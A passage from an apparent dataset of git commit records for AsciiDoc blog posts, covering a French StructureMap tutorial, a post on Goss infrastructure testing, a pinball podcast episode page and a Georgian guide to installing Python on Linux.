sont propre cycle de vie. Il est ensuite possible de l'utiliser dans la configuration avec la m\u00e9thode LifecycleIs<T> (ou T impl\u00e9mente ILifecycle).\n\nWARNING: Les cycles de vies personnalis\u00e9s peuvent \u00eatre utils\u00e9 dans bien des cas. Il existe des biblioth\u00e8ques qui fournissent des cycles sp\u00e9cialis\u00e9s, comme pour le Web par exemple. Avec la version 4 de StructureMap l'\u00e9quipe de d\u00e9veloppement encouragement fortement a ne plus utilis\u00e9 se mode fonctionnement mais \u00e0 pr\u00e9f\u00e9rer l'utilisation du NestedContainer \u00e0 la place. Il permette de repondre \u00e0 95% des cas de figures sans avoir besoin de librairie annexe ni de code suppl\u00e9mentaire.\n\nComme indiquer dans la note au dessus les NestedContainer permette aussi de g\u00e9rer le cycle de vie des instances. En les utilisant on se simplifie clairement la vie car \u00e0 partir du moment ou le NestedContainer est r\u00e9cup\u00e9rer tout les instances qui sont obtenues lui sont propre. Il suffit ensuite d'appeller la m\u00e9thode Dispose pour le lib\u00e9rer. C'est une m\u00e9thode tr\u00e8s fl\u00e9xible puisqu'elle suffit d'\u00e9tablir un scope pour que cela fonctionne. En plus dans ce mode toutes les d\u00e9pendances qui implemente IDisposable sont Dispose lors de l'appel \u00e0 la m\u00e9thode sur le NestedContainer. Du coup les trois \u00e9tats de StructureMap suffisent \u00e0 g\u00e9rer tous les cas, y compris ceux li\u00e9e au context Web. Pour illustrer cela un Scope simple peut \u00eatre imagin\u00e9 : L'\u00e9xecution d'une ligne de code. Dans ce cas voici les \u00e9tapes qui va falloir faire pour le mettre en place :\n\n* Le NestedContainer est cr\u00e9e et d\u00e9marrer le Scope\n* Le code voulut est execut\u00e9\n* Le NestedContainer lib\u00e8re les d\u00e9pendances.\n\nCes trois \u00e9tapes peuvent bien \u00e9videment \u00eatre rejouer \u00e0 l'infinit. Pour illustrer le bon fonctionnement du Dispose, un impl\u00e9mentation de ILogger disposable va \u00eatre utilis\u00e9 :\n\n[source,csharp]\n----\npublic class DisposableConsoleLogger : ConsoleLogger, IDisposable\n{\n\tpublic void Dispose()\n\t{\n\t\tConsole.WriteLine(\"Hello form Dispose !\");\n\t}\n}\n----\n\nPour la configuration rien ne change \u00e0 par le Use<T> qui utilise DisposableConsoleLogger :\n\n[source,csharp]\n----\nvar container = new Container(configuration =>\n{\n\tconfiguration.For<ILogger>().Use<DisposableConsoleLogger>();\n});\n----\n\nLe code des trois \u00e9tapes est le suivant :\n\n[source,csharp]\n----\nvar nested = container.GetNestedContainer();\nvar logger = nested.GetInstance<ILogger>();\nnested.Dispose();\/\/print Hello form Dispose !\n----\n\nPour illustrer l'isolation nette de se scope il suffit de l'inclure dans une boucle for et de test si la derni\u00e8re instance r\u00e9cup\u00e9rer est la m\u00eame que la courrant :\n\n[source,csharp]\n----\nILogger last = null;\nfor(var i = 0; i < 10; i++)\n{\n\tvar nested = container.GetNestedContainer();\n\tvar logger = nested.GetInstance<ILogger>();\n\tif (last != null)\n\tConsole.WriteLine(last == logger);\/\/print False\n\tlast = logger;\n\tnested.Dispose();\/\/print Hello form Dispose !\n}\n----\n\nAu final vraiement rien de compliqu\u00e9 avec le NestedContainer. C'est une technique puissante et tr\u00e8s \u00e9l\u00e9gante, il suffit juste de clairement d\u00e9finir son Scoping dans une application !\n\nArriver \u00e0 ce stade, le tour d'horizon de StructureMap est fait. Vous avez \u00e0 pr\u00e9sent les cl\u00e9s pour le mettre en place dans vos projets. L'exemple qui m'a servit pour \u00e9crire l'article est disponible sur Github Gist : https:\/\/gist.github.com\/Vtek\/7e5064a188417713a2d8[ici].\n\nPour finir je vous propose une derni\u00e8re petite partie sur les...\n\n\n== Best practices\n\nVoici un ensemble de r\u00e8gle qu'il est bon de suivre :\n\n* Masquer l'acc\u00e8s au Container : L'inversion de contr\u00f4le sert \u00e0 casser les adh\u00e9rances. Si vous utilise sp\u00e9cifiquement un Container pour r\u00e9soudre des d\u00e9pendances alors c'est l'inverse qui se produit. Il vaut donc mieux passer par une couche interm\u00e9diaire qui va vous permettre de changer le Container facileement si besoin.\n\n* Pr\u00e9f\u00e9re l'injection par constructeur : Elle ne demande pas de logique d'injection et est par cons\u00e9quent la mani\u00e8re la plus simple de la mettre en place !\n\n* N'oublier pas l'injection par propri\u00e9t\u00e9 : Certains cas ne sont pas traitable avec l'injection par constructeur, n'h\u00e9sitez surtout pas \u00e0 utiliser celle par propri\u00e9t\u00e9, elle est l\u00e0 pour \u00e7a !\n\n* Ne m\u00e9langer pas les cycles de vie : Beaucoup ont essayer et se sont casser les dents. Mise \u00e0 part le Singleton qui est simple \u00e0 comprendre et m\u00e9langer pour le reste abstenez-vous. En mixant le risque c'est que plus le projet grossit plus la grappe de r\u00e9tention entre les instances devient complexe. On peut vite arriver \u00e0 des situations hors de contr\u00f4le.\n\n* N'injectez pas des types primitifs : Techniquement c'est faisable mais c'est une erreur. Les d\u00e9pendant attentend des d\u00e9pendances d\u00e9finit par des contracts, les types primitifs ne r\u00e9pondent pas cela.\n\n* Ne faite pas de r\u00e9solution de d\u00e9pendance base sur des chaines de charact\u00e8re (Nom, Type, Namespace) : Ici encore techniquement c'est possible mais \u00e7a compl\u00e9xifie la maintenance et \u00e7a oblige \u00e0 revalider la configuration du Container \u00e0 chaque renommage de d\u00e9pendance, propri\u00e9t\u00e9, namespace. Au final vous allez perdre du temps et il y a d'autre fa\u00e7on de le faire bien plus \u00e9fficace.\n\n* Inutile de d\u00e9finir des cycles de vie, il vaut mieux utilis\u00e9 le Scoping : L'exemple des NestedContainer par de lui m\u00eame :)\n\n* Ne m\u00e9langer pas IoC et Reflexion : C'est une fausse bonne id\u00e9e. Se sont deux aspects bien diff\u00e9rents qui peuvent parfois aboutir au m\u00eame r\u00e9sultat mais qui n'ont pas du tout la m\u00eame vocation. Si vous en arriver \u00e0 faire de la r\u00e9flexion pour Activer des d\u00e9pendances dans ce cas l\u00e0 utiliser plut\u00f4t https:\/\/msdn.microsoft.com\/fr-fr\/library\/dd460648(v=vs.110).aspx[MEF] . Si se n'est pas le cas alors vous faites tr\u00e8s certainement quelque chose qu'un Container IoC fait d\u00e9j\u00e0 :)\n\n* Votre container ne devrait jamais \u00eatre utiliser dans des tests unitaires\n\n* Les d\u00e9pendances peuvent grossir en nombre rapidement. Pour mieux organiser leur configuration il existe dans StructureMap une classe appel\u00e9 Registry. Cette classe permet de grouper la configuration par domaine de d\u00e9pendance.\n\n* Avec l'inversion de contr\u00f4le la r\u00e9solution des d\u00e9pendances se fait au runtime. C'est donc l'application qui doit tenir les r\u00e9f\u00e9rences. Inutile d'essayer de les masquer, vous ne gagnerez pas plus de temps ni de confort de d\u00e9veloppement !\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"39fb3d4a1082cf243a8b50b244d9b08561f214e6","subject":"Update 2017-01-10-Easy-Infrastructure-Testing-with-Goss.adoc","message":"Update 2017-01-10-Easy-Infrastructure-Testing-with-Goss.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2017-01-10-Easy-Infrastructure-Testing-with-Goss.adoc","new_file":"_posts\/2017-01-10-Easy-Infrastructure-Testing-with-Goss.adoc","new_contents":"= Easy Infrastructure Testing with Goss\n:hp-tags: Configuration Management, Testing, Security, Monitoring, goss\n:hp-image: \/images\/covers\/cover-01.jpg\n\n\nIn the world of infrastructure new servers, VMs, containers or applications are often manually validated by a human and some form of build document or checkbox exercise takes place. Even with configuration management, mistakes happen and humans miss things.\n\nWouldn't it be great if there were an easy way to automatically validate new servers before they are live and we find the problems in production? Well, there is!\n\n== What is Goss?\nhttps:\/\/github.com\/aelsabbahy\/goss[Goss] is a tool that let's you easily test and validate infrastructure. Like http:\/\/serverspec.org\/[Serverspec] but without all the code. Goss allows you to define what a piece of infrastructure should look like with YAML or JSON. This is made even easier for us with the ability to auto add resources to the Goss configuration.\n\nGoss allows you to validate many different resource types such as files, users, groups, packages, services and http connectivity. You can read the full https:\/\/github.com\/aelsabbahy\/goss\/blob\/master\/docs\/manual.md#available-tests[Goss documentation].\n\n== Why Goss? \nWell, a few things make goss awesome: \n\n* Written in Go - it's a self contained binary with no dependencies on other libraries or Ruby. \n* It's super fast - taking advantages of Go's concurrency model tests are executed and returned almost instantly.\n* It's easy to get started with - defining resources in YAML or JSON makes it easy for infrastructure teams who may have limited development experience to get to grips with.\n\n=== An Example\nWe build a web server running Apache. Someone then checks that Apache `httpd` package is the correct version `2.4.25`, the `deployment` user is in the `www-data` group, there is an application directory at `\/srv\/www\/app`, we check the `httpd` service is running, we can connect to the application at `http:\/\/localhost\/app` and going to `http:\/\/localhost\/` gives a `404` error within 1 second.\n\nWith Goss, the YAML configuration would look like this:\n\n```yaml\n---\npackage:\n httpd:\n installed: true\n versions:\n - 2.4.25\nuser:\n deployment:\n exists: true\n groups:\n - deployment\n - www-data\nfile:\n \/srv\/www\/app:\n exists: true\n filetype: directory\nservice: \n httpd:\n enabled: true\n running: true\nhttp:\n http:\/\/localhost\/app:\n status: 200\n timeout: 1000\n http:\/\/localhost:\n status: 404\n timeout: 1000 \n```\n\nThat's quite simple, easy to understand what is being validated and can be used to consistently validate all servers of that configuration.\n\n== Server Validation and Monitoring\nAll this validation of files, processes, services, ports etc... sounds familiar. It's something that we quite often try to achieve with our monitoring tools like Nagios, Zabbix or Sensu.\n\nWith Goss we can create a single monitoring check for validation of a piece of infrastructure that may test many resources. Goss has outputs to make this really easy. The nagios_verbose output gives feedback on what is wrong:\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/1253072\/18037748\/76f65a32-6d83-11e6-9aba-bceabb8430a3.png[Goss - nagios_verbose output]\n\nServer validation can now become part of your monitoring pipeline ensuring that any problems are identified quickly with a single monitoring check.\n\nWARNING: Goss won't replace all of your checks, it doesn't check things like HDD space, RAM usage or errors in log files. But it makes a sweet addition to server \/ service monitoring.\n\n== HTTP Health Endpoint\nIt's becoming increasingly common to expose health endpoints for applications and services. Google did this with their Borgmon monitoring system, https:\/\/prometheus.io\/[Prometheus] also uses this scrape model and there are several libraries out there such as http:\/\/metrics.dropwizard.io\/3.1.0\/[Dropwizard Metrics] or http:\/\/blog.kristian.io\/django-health-check\/[Django Health Check] to name a few. \n\nGoss has a `serve` command that exposes a http endpoint with configurable output such as json. This makes it easy to create a simpe UI or utilise something like https:\/\/www.phpservermonitor.org\/[PHP Server Monitor] to show the validation status of each piece of infrastructure.\n\n== Final Thoughts\n\nI hope with that with some learning and experimentation you can see the value of validation testing your infrastructure and building validation into your monitoring systems. Goss is a young project and currently only supports Linux although it is active and open to contributions. You can help out by opening issues and pull requests.\n\nI'll follow up with more in-depth posts Goss related posts in the future. Thanks for reading!\n","old_contents":"= Easy Infrastructure Testing with Goss\n:hp-tags: Configuration Management, Testing, Security, Monitoring, goss\n:hp-image: covers\/cover-01.jpg\n\n\nIn the world of infrastructure new servers, VMs, containers or applications are often manually validated by a human and some form of build document or checkbox exercise takes place. Even with configuration management, mistakes happen and humans miss things.\n\nWouldn't it be great if there were an easy way to automatically validate new servers before they are live and we find the problems in production? Well, there is!\n\n== What is Goss?\nhttps:\/\/github.com\/aelsabbahy\/goss[Goss] is a tool that let's you easily test and validate infrastructure. Like http:\/\/serverspec.org\/[Serverspec] but without all the code. Goss allows you to define what a piece of infrastructure should look like with YAML or JSON. This is made even easier for us with the ability to auto add resources to the Goss configuration.\n\nGoss allows you to validate many different resource types such as files, users, groups, packages, services and http connectivity. You can read the full https:\/\/github.com\/aelsabbahy\/goss\/blob\/master\/docs\/manual.md#available-tests[Goss documentation].\n\n== Why Goss? \nWell, a few things make goss awesome: \n\n* Written in Go - it's a self contained binary with no dependencies on other libraries or Ruby. \n* It's super fast - taking advantages of Go's concurrency model tests are executed and returned almost instantly.\n* It's easy to get started with - defining resources in YAML or JSON makes it easy for infrastructure teams who may have limited development experience to get to grips with.\n\n=== An Example\nWe build a web server running Apache. Someone then checks that Apache `httpd` package is the correct version `2.4.25`, the `deployment` user is in the `www-data` group, there is an application directory at `\/srv\/www\/app`, we check the `httpd` service is running, we can connect to the application at `http:\/\/localhost\/app` and going to `http:\/\/localhost\/` gives a `404` error within 1 second.\n\nWith Goss, the YAML configuration would look like this:\n\n```yaml\n---\npackage:\n httpd:\n installed: true\n versions:\n - 2.4.25\nuser:\n deployment:\n exists: true\n groups:\n - deployment\n - www-data\nfile:\n \/srv\/www\/app:\n exists: true\n filetype: directory\nservice: \n httpd:\n enabled: true\n running: true\nhttp:\n http:\/\/localhost\/app:\n status: 200\n timeout: 1000\n http:\/\/localhost:\n status: 404\n timeout: 1000 \n```\n\nThat's quite simple, easy to understand what is being validated and can be used to consistently validate all servers of that configuration.\n\n== Server Validation and Monitoring\nAll this validation of files, processes, services, ports etc... sounds familiar. It's something that we quite often try to achieve with our monitoring tools like Nagios, Zabbix or Sensu.\n\nWith Goss we can create a single monitoring check for validation of a piece of infrastructure that may test many resources. Goss has outputs to make this really easy. The nagios_verbose output gives feedback on what is wrong:\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/1253072\/18037748\/76f65a32-6d83-11e6-9aba-bceabb8430a3.png[Goss - nagios_verbose output]\n\nServer validation can now become part of your monitoring pipeline ensuring that any problems are identified quickly with a single monitoring check.\n\nWARNING: Goss won't replace all of your checks, it doesn't check things like HDD space, RAM usage or errors in log files. But it makes a sweet addition to server \/ service monitoring.\n\n== HTTP Health Endpoint\nIt's becoming increasingly common to expose health endpoints for applications and services. Google did this with their Borgmon monitoring system, https:\/\/prometheus.io\/[Prometheus] also uses this scrape model and there are several libraries out there such as http:\/\/metrics.dropwizard.io\/3.1.0\/[Dropwizard Metrics] or http:\/\/blog.kristian.io\/django-health-check\/[Django Health Check] to name a few. \n\nGoss has a `serve` command that exposes a http endpoint with configurable output such as json. This makes it easy to create a simpe UI or utilise something like https:\/\/www.phpservermonitor.org\/[PHP Server Monitor] to show the validation status of each piece of infrastructure.\n\n== Final Thoughts\n\nI hope with that with some learning and experimentation you can see the value of validation testing your infrastructure and building validation into your monitoring systems. Goss is a young project and currently only supports Linux although it is active and open to contributions. You can help out by opening issues and pull requests.\n\nI'll follow up with more in-depth posts Goss related posts in the future. Thanks for reading!\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"77492d34e93d5bdb7d69c65dd9e7a5bb63ea2b6e","subject":"Update 2016-06-29-Episode-62-Console-Yourself-With-Cheap-Steam.adoc","message":"Update 2016-06-29-Episode-62-Console-Yourself-With-Cheap-Steam.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-06-29-Episode-62-Console-Yourself-With-Cheap-Steam.adoc","new_file":"_posts\/2016-06-29-Episode-62-Console-Yourself-With-Cheap-Steam.adoc","new_contents":"= Episode 62: Console Yourself With Cheap Steam\n:hp-tags: steam, console, UI, BackRoom\n:hp-image: logo.png\n\nIt's a bit light on this week with pinball news.\n\nIn light of this, we look into how folks on other platforms could capitalise on Steam Sales for PC.\nYou might be surprised about how easy it is for a TPA Console player (PS3\/PS4 or XBox) to get cheap tables and frequent updates.\n\nIn the aftermath of the New UI Premature birth on Android, we also give a PSA about how to talk to engineers about fixes or observations you have with an application.\n\nThere's a BlahCade BackRoom longer than the main show, with one of the most obnoxious wedding announcements you will have ever heard.\nIf you don't fancy hearing us talking about it, just take a look at the link and prepare to groan.\n\nNOTE: There is a bit of an audio race condition at about 17 minutes in.\nIt sounds like Jared is talking right over Chris.\nHe wasn't.\nIt's a Blab thing...\n\n== Links\n\nhttp:\/\/shoutengine.com\/BlahCadePodcast\/#[Stream\/Download\/RSS]\n\nhttps:\/\/itunes.apple.com\/us\/podcast\/blahcade-podcast\/id1039748922?mt=2[iTunes]\n\nhttps:\/\/twitter.com\/blahcade[@BlahCade on Twitter]\n\nhttps:\/\/blab.im\/BlahCade[BlahCade on Blab.im (Live Session Recordings)]\n\nhttps:\/\/represent.com\/blahcade-shirt[BlahCade T-shirts on represent.com]\n\n== Timings\n\n* Introduction - 0:30\n* Beta for Indy 500 on PC - 1:10\n* Pinball Arcade Tables Deeply Discounted - 3:20\n* Zen Tables Deeply Discounted - 6:05\n* Should Console Owners Switch to Steam? - 6:35\n** What is the minimum recommended GPU spec? - 7:20\n** Can a GTX-670 cope with TPA? - 9:15\n** Chris, reporting from Blackwater 300 - 10:45\n** How could I test it out on my PC? - 11:40\n* http:\/\/www.samvandoorn.net\/?\/web\/project-1\/[_STYN The Machine_ by Sam Van Doorn] - 12:45\n* New UI on Android Progress Report - 15:20\n** _Constructive_ criticism sought - 17:50\n** How to be constructive when providing feedback - 19:40\n* TPA Android Users Guide 2.0 - 22:08\n* Outtro (before BackRoom) - 24:14\n* http:\/\/postgradproblems.com\/this-hipster-marriage-announcement-from-the-new-york-times-is-the-most-insufferable-yet\/[BackRoom: Hipster Wedding Announcement] - 25:55\n* Hard Outtro - 43:25\n","old_contents":"= Episode 62: Console Yourself With Cheap Steam\n:hp-tags: steam, console, New_UI, BackRoom\n:hp-image: logo.png\n\nIt's a bit light on this week with pinball news.\n\nIn light of this, we look into how folks on other platforms could capitalise on Steam Sales for PC.\nYou might be surprised about how easy it is for a TPA Console player (PS3\/PS4 or XBox) to get cheap tables and frequent updates.\n\nIn the aftermath of the New UI Premature birth on Android, we also give a PSA about how to talk to engineers about fixes or observations you have with an application.\n\nThere's a BlahCade BackRoom longer than the main show, with one of the most obnoxious wedding announcements you will have ever heard.\nIf you don't fancy hearing us talking about it, just take a look at the link and prepare to groan.\n\nNOTE: There is a bit of an audio race condition at about 17 minutes in.\nIt sounds like Jared is talking right over Chris.\nHe wasn't.\nIt's a Blab thing...\n\n== Links\n\nhttp:\/\/shoutengine.com\/BlahCadePodcast\/#[Stream\/Download\/RSS]\n\nhttps:\/\/itunes.apple.com\/us\/podcast\/blahcade-podcast\/id1039748922?mt=2[iTunes]\n\nhttps:\/\/twitter.com\/blahcade[@BlahCade on Twitter]\n\nhttps:\/\/blab.im\/BlahCade[BlahCade on Blab.im (Live Session Recordings)]\n\nhttps:\/\/represent.com\/blahcade-shirt[BlahCade T-shirts on represent.com]\n\n== Timings\n\n* Introduction - 0:30\n* Beta for Indy 500 on PC - 1:10\n* Pinball Arcade Tables Deeply Discounted - 3:20\n* Zen Tables Deeply Discounted - 6:05\n* Should Console Owners Switch to Steam? - 6:35\n** What is the minimum recommended GPU spec? - 7:20\n** Can a GTX-670 cope with TPA? - 9:15\n** Chris, reporting from Blackwater 300 - 10:45\n** How could I test it out on my PC? - 11:40\n* http:\/\/www.samvandoorn.net\/?\/web\/project-1\/[_STYN The Machine_ by Sam Van Doorn] - 12:45\n* New UI on Android Progress Report - 15:20\n** _Constructive_ criticism sought - 17:50\n** How to be constructive when providing feedback - 19:40\n* TPA Android Users Guide 2.0 - 22:08\n* Outtro (before BackRoom) - 24:14\n* http:\/\/postgradproblems.com\/this-hipster-marriage-announcement-from-the-new-york-times-is-the-most-insufferable-yet\/[BackRoom: Hipster Wedding Announcement] - 25:55\n* Hard Outtro - 43:25\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"0971cd6ab7129aef283617e9ab9a1fb4c49e795e","subject":"Update 2016-01-13-how-to-install-python-on-linux.adoc","message":"Update 2016-01-13-how-to-install-python-on-linux.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-13-how-to-install-python-on-linux.adoc","new_file":"_posts\/2016-01-13-how-to-install-python-on-linux.adoc","new_contents":"= \u10e0\u10dd\u10d2\u10dd\u10e0 \u10d3\u10d0\u10d5\u10d0\u10e7\u10d4\u10dc\u10dd\u10d7 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8 \u10da\u10d8\u10dc\u10e3\u10e5\u10e1\u10d6\u10d4\n:hp-alt-title: how to install python on linux\n:hp-image: https:\/\/raw.githubusercontent.com\/Lh4cKg\/Lh4cKg.github.io\/master\/images\/python-pip.png\n\n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0 \u10e8\u10d4\u10d8\u10eb\u10da\u10d4\u10d1\u10d0 \u10dc\u10d4\u10d1\u10d8\u10e1\u10db\u10d8\u10d4\u10e0 \u10dd\u10de\u10d4\u10e0\u10d0\u10ea\u10d8\u10e3\u10da \u10e1\u10d8\u10e1\u10e2\u10d4\u10db\u10d0\u10d6\u10d4. \u10e0\u10dd\u10d2\u10dd\u10e0\u10d4\u10d1\u10d8\u10ea\u10d0\u10d0 \u10db\u10d0\u10d2. Windows, Unix \u10d3\u10d0 Linux \u10dd\u10de\u10d4\u10e0\u10d0\u10ea\u10d8\u10e3\u10da \u10e1\u10d8\u10e1\u10e2\u10d4\u10db\u10d4\u10d1\u10d6\u10d4.\n\u10db\u10d0\u10e0\u10e2\u10d8\u10d5\u10d8 \u10d2\u10d6\u10d0 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d0\u10e0\u10d8\u10e1 package manager \u10d8\u10e1 \u10d2\u10d0\u10db\u10dd\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0, \u10db\u10d0\u10d2. apt-get, yum, pacman \u10d3\u10d0 \u10d0.\u10e8.\n\ndebian\/ubuntu \u10d3\u10d8\u10e1\u10e2\u10e0\u10d8\u10d1\u10e3\u10e2\u10d8\u10d5\u10d4\u10d1\u10d6\u10d4 \u10e8\u10d4\u10d2\u10d5\u10d8\u10eb\u10da\u10d8\u10d0 \u10d2\u10d0\u10d5\u10e3\u10e8\u10d5\u10d0\u10d7 \u10d1\u10e0\u10eb\u10d0\u10dc\u10d4\u10d1\u10d0\n\u10db\u10d0\u10d2. \u10d7\u10e3 \u10d2\u10d5\u10d8\u10dc\u10d3\u10d0 2.x \u10d5\u10d4\u10e0\u10e1\u10d8\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0\n\n * sudo apt-get install python2.7\n\n\u10d7\u10e3 \u10d2\u10d5\u10d8\u10dc\u10d3\u10d0 3.x \u10d5\u10d4\u10e0\u10e1\u10d8\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0\n\n * sudo apt-get install python3.3\n \n\n\u10d0\u10e1\u10d4\u10d5\u10d4 \u10e8\u10d4\u10d2\u10d5\u10d8\u10eb\u10da\u10d8\u10d0 \u10d3\u10d0\u10d5\u10d0\u10e7\u10d4\u10dc\u10dd\u10d7 \u10d1\u10dd\u10da\u10dd \u10d5\u10d4\u10e0\u10e1\u10d8\u10d0 \u10d9\u10dd\u10d3\u10d8\u10e1 \u10ec\u10e7\u10d0\u10e0\u10dd\u10d3\u10d0\u10dc \u10d0\u10dc\u10e3 \u10d8\u10d2\u10d8\u10d5\u10d4(Source), \u10d9\u10dd\u10d3\u10d8\u10e1 \u10ec\u10e7\u10d0\u10e0\u10dd\u10e1 \u10d2\u10d0\u10d3\u10db\u10dd\u10ec\u10d4\u10e0\u10d0 \u10e8\u10d4\u10d2\u10d8\u10eb\u10da\u10d8\u10d0\u10d7 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10dd\u10e4\u10d8\u10ea\u10d8\u10d0\u10da\u10e3\u10e0\u10d8 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d8\u10d3\u10d0\u10dc \u10d0\u10dc Ftp \u10d3\u10d0\u10dc - https:\/\/www.python.org\/ftp\/python\/[Python Source Code] \u10d5\u10d8\u10e0\u10e9\u10d4\u10d5\u10d7 \u10d1\u10dd\u10da\u10dd \u10d5\u10d4\u10e0\u10e1\u10d8\u10d0\u10e1 3.5.1 \u10d3\u10d0 \u10d5\u10d8\u10ec\u10d4\u10e0\u10d7 *.tgz \u10e4\u10dd\u10e0\u10db\u10d0\u10e2\u10d8\u10e1 \u10e4\u10d0\u10d8\u10da\u10e1 Python-3.5.1.tgz \u10e8\u10d4\u10db\u10d3\u10d4\u10d2 \u10d5\u10ee\u10e1\u10dc\u10d8\u10d7 \u10e2\u10d4\u10e0\u10db\u10d8\u10dc\u10d0\u10da\u10e1 \u10d3\u10d0 \u10d5\u10e3\u10e8\u10d5\u10d4\u10d1\u10d7 \u10e5\u10d5\u10d4\u10db\u10dd\u10d7 \u10db\u10dd\u10ea\u10d4\u10db\u10e3\u10da \u10d1\u10e0\u10eb\u10d0\u10dc\u10d4\u10d1\u10d4\u10d1\u10e1\n\n * wget http:\/\/python.org\/ftp\/python\/3.5.1\/Python-3.5.1.tgz\n * tar -xvf Python-3.5.1.tgz\n * cd Python-3.5.1\n * .\/configure\n * make\n * make altinstall\n \n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d8\u10e1 \u10de\u10e0\u10dd\u10ea\u10d4\u10e1\u10d8 \u10ec\u10d0\u10e0\u10db\u10d0\u10e2\u10d4\u10d1\u10d8\u10d7 \u10d3\u10d0\u10e1\u10e0\u10e3\u10da\u10d3\u10d0.\n\n\u10dc\u10d0\u10ee\u10d4\u10d7 \u10e1\u10e3\u10e0\u10d0\u10d7\u10d8\nimage:https:\/\/raw.githubusercontent.com\/Lh4cKg\/Lh4cKg.github.io\/master\/images\/pythonge.png []\n\n:hp-tags: title[\u10de\u10d8\u10d7\u10dd\u10dc\u10d8],title[\u10da\u10d8\u10dc\u10e3\u10e5\u10e1\u10d8]","old_contents":"= \u10e0\u10dd\u10d2\u10dd\u10e0 \u10d3\u10d0\u10d5\u10d0\u10e7\u10d4\u10dc\u10dd\u10d7 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8 \u10da\u10d8\u10dc\u10e3\u10e5\u10e1\u10d6\u10d4\n:hp-alt-title: how to install python on linux\n:hp-image: https:\/\/raw.githubusercontent.com\/Lh4cKg\/Lh4cKg.github.io\/master\/images\/python-pip.png\n\n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0 \u10e8\u10d4\u10d8\u10eb\u10da\u10d4\u10d1\u10d0 \u10dc\u10d4\u10d1\u10d8\u10e1\u10db\u10d8\u10d4\u10e0 \u10dd\u10de\u10d4\u10e0\u10d0\u10ea\u10d8\u10e3\u10da \u10e1\u10d8\u10e1\u10e2\u10d4\u10db\u10d0\u10d6\u10d4. \u10e0\u10dd\u10d2\u10dd\u10e0\u10d4\u10d1\u10d8\u10ea\u10d0\u10d0 \u10db\u10d0\u10d2. Windows, Unix \u10d3\u10d0 Linux \u10dd\u10de\u10d4\u10e0\u10d0\u10ea\u10d8\u10e3\u10da \u10e1\u10d8\u10e1\u10e2\u10d4\u10db\u10d4\u10d1\u10d6\u10d4.\n\u10db\u10d0\u10e0\u10e2\u10d8\u10d5\u10d8 \u10d2\u10d6\u10d0 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d0\u10e0\u10d8\u10e1 package manager \u10d8\u10e1 \u10d2\u10d0\u10db\u10dd\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0, \u10db\u10d0\u10d2. apt-get, yum, pacman \u10d3\u10d0 \u10d0.\u10e8.\n\ndebian\/ubuntu \u10d3\u10d8\u10e1\u10e2\u10e0\u10d8\u10d1\u10e3\u10e2\u10d8\u10d5\u10d4\u10d1\u10d6\u10d4 \u10e8\u10d4\u10d2\u10d5\u10d8\u10eb\u10da\u10d8\u10d0 \u10d2\u10d0\u10d5\u10e3\u10e8\u10d5\u10d0\u10d7 \u10d1\u10e0\u10eb\u10d0\u10dc\u10d4\u10d1\u10d0\n\u10db\u10d0\u10d2. \u10d7\u10e3 \u10d2\u10d5\u10d8\u10dc\u10d3\u10d0 2.x \u10d5\u10d4\u10e0\u10e1\u10d8\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0\n\n * sudo apt-get install python2.7\n\n\u10d7\u10e3 \u10d2\u10d5\u10d8\u10dc\u10d3\u10d0 3.x \u10d5\u10d4\u10e0\u10e1\u10d8\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0\n\n * sudo apt-get install python3.3\n \n\n\u10d0\u10e1\u10d4\u10d5\u10d4 \u10e8\u10d4\u10d2\u10d5\u10d8\u10eb\u10da\u10d8\u10d0 \u10d3\u10d0\u10d5\u10d0\u10e7\u10d4\u10dc\u10dd\u10d7 \u10d1\u10dd\u10da\u10dd \u10d5\u10d4\u10e0\u10e1\u10d8\u10d0 \u10e1\u10dd\u10e0\u10e1\u10d8\u10d3\u10d0\u10dc, \u10e1\u10dd\u10e0\u10e1\u10d8\u10e1 \u10d2\u10d0\u10d3\u10db\u10dd\u10ec\u10d4\u10e0\u10d0 \u10e8\u10d4\u10d2\u10d8\u10eb\u10da\u10d8\u10d0\u10d7 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10dd\u10e4\u10d8\u10ea\u10d8\u10d0\u10da\u10e3\u10e0\u10d8 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d8\u10d3\u10d0\u10dc \u10d0\u10dc Ftp 